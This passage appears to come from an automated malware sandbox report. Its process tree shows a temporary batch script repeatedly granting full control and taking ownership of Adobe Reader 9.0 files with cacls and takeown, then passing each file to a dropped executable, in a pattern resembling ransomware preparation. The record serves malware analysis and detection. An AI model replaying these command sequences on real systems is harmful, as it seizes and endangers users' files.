    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt"
    3⤵
    PID:1892
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "DisplayLanguageNames.en_CA.txt" -nobanner
    3⤵
    PID:1884
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "DisplayLanguageNames.en_CA.txt" -nobanner
      4⤵
      PID:952
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2020
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM""
  2⤵
  PID:364
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM" /E /G Admin:F /C
    3⤵
    PID:1648
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM"
    3⤵
    PID:1440
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "SY______.PFM" -nobanner
    3⤵
    PID:1744
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "SY______.PFM" -nobanner
      4⤵
      PID:1448
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1820
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt""
  2⤵
  PID:1120
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt" /E /G Admin:F /C
    3⤵
    PID:968
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt"
    3⤵
    PID:1816
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "DisplayLanguageNames.en_GB.txt" -nobanner
    3⤵
    PID:316
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "DisplayLanguageNames.en_GB.txt" -nobanner
      4⤵
      PID:596
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:824
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif""
  2⤵
  PID:1408
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif" /E /G Admin:F /C
    3⤵
    PID:1564
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif"
    3⤵
    PID:972
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "email_all.gif" -nobanner
    3⤵
    PID:1276
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "email_all.gif" -nobanner
      4⤵
      PID:2020
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1888
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif""
  2⤵
  PID:1620
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif" /E /G Admin:F /C
    3⤵
    PID:964
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif"
    3⤵
    PID:1448
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "info.gif" -nobanner
    3⤵
    PID:1220
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "info.gif" -nobanner
      4⤵
      PID:1836
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1876
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif""
  2⤵
  PID:636
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif" /E /G Admin:F /C
    3⤵
    PID:232
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif"
    3⤵
    PID:1964
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "review_browser.gif" -nobanner
    3⤵
    PID:1904
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "review_browser.gif" -nobanner
      4⤵
      PID:824
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1260
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif""
  2⤵
  PID:1444
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif" /E /G Admin:F /C
    3⤵
    PID:1596
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif"
    3⤵
    - Modifies file permissions
    PID:1436
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "stop_collection_data.gif" -nobanner
    3⤵
    PID:1404
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "stop_collection_data.gif" -nobanner
      4⤵
      PID:1952
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1484
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif""
  2⤵
  PID:228
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif" /E /G Admin:F /C
    3⤵
    PID:364
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif"
    3⤵
    PID:2036
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "turnOnNotificationInTray.gif" -nobanner
    3⤵
    PID:1452
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "turnOnNotificationInTray.gif" -nobanner
      4⤵
      PID:1876
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1492
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf""
  2⤵
  PID:596
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf" /E /G Admin:F /C
    3⤵
    PID:1120
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf"
    3⤵
    PID:1808
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "CourierStd-Oblique.otf" -nobanner
    3⤵
    PID:1584
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "CourierStd-Oblique.otf" -nobanner
      4⤵
      PID:1644
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:952
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf""
  2⤵
  PID:948
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf" /E /G Admin:F /C
    3⤵
    PID:1408
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf"
    3⤵
    PID:472
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "MyriadPro-It.otf" -nobanner
    3⤵
    PID:1440
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "MyriadPro-It.otf" -nobanner
      4⤵
      PID:1484
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1884
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe""
  2⤵
  PID:1900
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe" /E /G Admin:F /C
    3⤵
    PID:1620
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe"
    3⤵
    PID:568
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "SC_Reader.exe" -nobanner
    3⤵
    PID:1200
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "SC_Reader.exe" -nobanner
      4⤵
      PID:112
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2024
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp""
  2⤵
  PID:1924
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp" /E /G Admin:F /C
    3⤵
    PID:1136
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp"
    3⤵
    PID:1116
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "brt04.hsp" -nobanner
    3⤵
    PID:972
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "brt04.hsp" -nobanner
      4⤵
      PID:952
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:316
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths""
  2⤵
  PID:1044
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths" /E /G Admin:F /C
    3⤵
    PID:1444
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths"
    3⤵
    PID:1440
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "can03.ths" -nobanner
    3⤵
    PID:1448
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "can03.ths" -nobanner
      4⤵
      PID:1736
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1836
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths""
  2⤵
  PID:1096
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths" /E /G Admin:F /C
    3⤵
    PID:228
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths"
    3⤵
    PID:112
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "brt55.ths" -nobanner
    3⤵
    PID:1804
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "brt55.ths" -nobanner
      4⤵
      PID:2024
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1220
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx""
  2⤵
  PID:1644
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx" /E /G Admin:F /C
    3⤵
    PID:596
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx"
    3⤵
    - Modifies file permissions
    PID:2020
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "brt32.clx" -nobanner
    3⤵
    PID:1588
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "brt32.clx" -nobanner
      4⤵
      PID:316
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1904
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env""
  2⤵
  PID:1028
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env" /E /G Admin:F /C
    3⤵
    PID:948
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env"
    3⤵
    - Modifies file permissions
    PID:2012
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "engphon.env" -nobanner
    3⤵
    PID:2036
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "engphon.env" -nobanner
      4⤵
      PID:1836
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1404
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp""
  2⤵
  PID:1004
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp" /E /G Admin:F /C
    3⤵
    PID:364
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp"
    3⤵
    - Modifies file permissions
    PID:824
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "eng.hyp" -nobanner
    3⤵
    PID:968
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "eng.hyp" -nobanner
      4⤵
      PID:1820
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:924
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths""
  2⤵
  PID:204
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths" /E /G Admin:F /C
    3⤵
    PID:1924
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths"
    3⤵
    - Modifies file permissions
    PID:1952
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "usa03.ths" -nobanner
    3⤵
    PID:1484
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "usa03.ths" -nobanner
      4⤵
      PID:1904
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1584
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt""
  2⤵
  PID:1276
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt" /E /G Admin:F /C
    3⤵
    PID:1044
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt"
    3⤵
    PID:1876
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "zdingbat.txt" -nobanner
    3⤵
    PID:568
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "zdingbat.txt" -nobanner
      4⤵
      PID:1404
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1996
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx""
  2⤵
  PID:572
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx" /E /G Admin:F /C
    3⤵
    PID:1492
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx"
    3⤵
    - Modifies file permissions
    PID:1892
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "eng32.clx" -nobanner
    3⤵
    PID:952
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "eng32.clx" -nobanner
      4⤵
      PID:1900
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1436
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt""
  2⤵
  PID:1924
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt" /E /G Admin:F /C
    3⤵
    PID:1076
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt"
    3⤵
    PID:1484
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "symbol.txt" -nobanner
    3⤵
    PID:928
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "symbol.txt" -nobanner
      4⤵
      PID:596
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1568
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat""
  2⤵
  PID:1044
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat" /E /G Admin:F /C
    3⤵
    PID:1888
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat"
    3⤵
    PID:568
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "icudt26l.dat" -nobanner
    3⤵
    PID:2024
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "icudt26l.dat" -nobanner
      4⤵
      PID:948
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1808
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig""
  2⤵
  PID:1492
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig" /E /G Admin:F /C
    3⤵
    PID:1200
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig"
    3⤵
    PID:952
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "cryptocme2.sig" -nobanner
    3⤵
    PID:2020
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "cryptocme2.sig" -nobanner
      4⤵
      PID:364
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1588
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc""
  2⤵
  PID:1076
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc" /E /G Admin:F /C
    3⤵
    PID:204
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc"
    3⤵
    PID:928
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "adobepdf.xdc" -nobanner
    3⤵
    PID:208
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "adobepdf.xdc" -nobanner
      4⤵
      PID:2012
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1136
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT""
  2⤵
  PID:1744
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT" /E /G Admin:F /C
    3⤵
    PID:1980
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT"
    3⤵
    PID:948
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "CROATIAN.TXT" -nobanner
    3⤵
    PID:1620
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "CROATIAN.TXT" -nobanner
      4⤵
      PID:1808
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1876
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT""
  2⤵
  PID:940
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT" /E /G Admin:F /C
    3⤵
    PID:1220
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT"
    3⤵
    PID:364
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "ROMAN.TXT" -nobanner
    3⤵
    PID:2028
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "ROMAN.TXT" -nobanner
      4⤵
      PID:324
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1460
